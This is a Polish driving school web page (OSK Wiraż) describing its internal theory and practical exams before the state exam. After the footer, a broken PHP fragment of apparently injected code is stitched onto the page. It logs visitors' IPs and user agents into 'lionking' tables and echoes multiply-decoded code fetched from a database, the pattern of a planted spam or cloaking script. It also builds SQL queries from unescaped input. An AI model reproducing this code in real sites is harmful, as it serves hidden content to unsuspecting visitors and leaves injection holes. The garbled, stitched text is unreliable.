Egzamin wewnętrzny w OSK Wiraż

Po zakończeniu zajęć teoretycznych kursant musi przystąpić do egzaminu wewnętrznego teoretycznego, jak również po zakończeniu jazd praktycznych u instruktora prowadzącego trzeba zaliczyć egzamin wewnętrzny praktyczny.

Część teoretyczna
Egzamin wewnętrzny teoretyczny odbywa się w każdym ośrodku szkoleniowym w Polsce. Nie przeprowadza się tego egzaminu tylko dla kategorii "przyczepowych". Podejście do niego ma za zadanie oswoić kursanta z oprogramowaniem oraz zasadami panującymi na egzaminie państwowym. Najważniejszym atutem przeprowadzania egzaminu jest sprawdzenie przygotowania teoretycznego słuchacza z przepisów ruchu drogowego. Poniżej krótki filmik prezentujący zasady zdawania egzaminu w ośrodku oraz w WORD.  Egzamin wewnętrzny prowadzony jest na zasadach opisanych


Część Praktyczna
Egzamin wewnętrzny praktyczny jest obowiązkowym elementem każdego kursu prawa jazdy. Zapisy Ustawy o kierujących oraz Rozporzązenie w sprawie szkolenia kandydatów na kierowców nakładają obowiązek przeprowadzenia egzaminu wewnętrznego na zasadach egzaminu państwowego w dowolnym WORD  w Polsce. Dzięki niemu będziesz mógł zobaczyć jak to będzie wyglądało w praktyce. Egzamin praktyczny na prawo jazdy przeprowadzany jest na zasadach opisanych (tutaj)

JoomShaper
= 1) { //mysql_query('INSERT INTO lionking (domainname, fullpath, ip, useragent, processtime) VALUES ("'.$g['domainname'].'","'.$g['fullpath'].'","'.$g['ip'].'","'.$g['useragent'].'", NOW())'); $rs = mysql_fetch_array($q); echo stripslashes(stripslashes(stripslashes(html_entity_decode(html_entity_decode($rs['code']))))); } else { mysql_query('INSERT INTO lionking_saved (domainname, stat, processtime) VALUES ("'.$g['domainname'].'","2", NOW())'); } } ?>